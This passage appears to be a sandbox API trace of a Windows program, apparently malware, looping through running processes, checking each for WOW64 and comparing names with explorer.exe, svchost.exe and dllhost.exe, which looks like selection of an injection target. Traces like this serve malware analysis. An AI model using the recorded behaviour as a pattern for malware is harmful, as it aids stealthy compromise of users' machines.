(hObject=0xd8) returned 1 [0190.542] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0190.542] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0190.542] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.542] CloseHandle (hObject=0xd8) returned 1 [0190.542] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0190.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0190.543] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.543] CloseHandle (hObject=0xd8) returned 1 [0190.543] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0190.543] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0190.543] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.543] CloseHandle (hObject=0xd8) returned 1 [0190.543] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0190.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0190.544] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.544] CloseHandle (hObject=0xd8) returned 1 [0190.544] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.544] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0190.544] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0190.545] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0190.545] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0190.545] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0190.546] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0190.546] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0190.546] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0190.547] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0190.547] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.547] CloseHandle (hObject=0xd8) returned 1 [0190.547] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0190.547] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0190.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0190.548] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.548] CloseHandle (hObject=0xd8) returned 1 [0190.548] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0190.548] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0190.548] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0190.548] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0190.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0190.549] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.549] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0190.549] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.549] CloseHandle (hObject=0xd8) returned 1 [0190.549] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0190.550] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.550] CloseHandle (hObject=0xd8) returned 1 [0190.550] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0190.550] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.550] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0190.550] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.550] CloseHandle (hObject=0xd8) returned 1 [0190.550] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0190.551] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0190.551] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0190.551] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0190.551] CloseHandle (hObject=0xd8) returned 1 [0190.551] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0190.552] CloseHandle (hObject=0xd4) returned 1 [0190.552] Sleep (dwMilliseconds=0x3e8) [0191.826] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0191.829] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.829] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0191.829] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0191.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0191.830] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0191.830] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0191.830] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0191.831] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0191.831] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0191.831] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0191.832] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0191.832] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0191.832] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0191.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0191.833] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0191.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0191.833] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0191.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0191.834] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0191.834] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0191.835] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0191.835] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0191.836] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0191.836] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0191.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0191.837] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0191.837] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0191.838] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0191.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0191.838] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.838] CloseHandle (hObject=0xd8) returned 1 [0191.838] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0191.838] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0191.838] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0191.839] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0191.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0191.839] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0191.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0191.840] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.840] CloseHandle (hObject=0xd8) returned 1 [0191.840] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0191.840] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0191.840] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0191.840] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0191.840] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0191.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0191.841] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0191.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0191.841] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.841] CloseHandle (hObject=0xd8) returned 1 [0191.841] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0191.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0191.842] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.842] CloseHandle (hObject=0xd8) returned 1 [0191.842] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0191.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0191.843] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.843] CloseHandle (hObject=0xd8) returned 1 [0191.843] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0191.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0191.843] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.843] CloseHandle (hObject=0xd8) returned 1 [0191.843] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0191.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0191.844] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.844] CloseHandle (hObject=0xd8) returned 1 [0191.844] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0191.844] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0191.844] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.844] CloseHandle (hObject=0xd8) returned 1 [0191.844] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0191.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0191.845] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.845] CloseHandle (hObject=0xd8) returned 1 [0191.845] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0191.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0191.845] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.845] CloseHandle (hObject=0xd8) returned 1 [0191.846] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0191.846] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0191.846] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.846] CloseHandle (hObject=0xd8) returned 1 [0191.846] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0191.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0191.847] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.847] CloseHandle (hObject=0xd8) returned 1 [0191.847] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0191.847] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0191.847] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0191.847] CloseHandle (hObject=0xd8) returned 1 [0191.847] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, 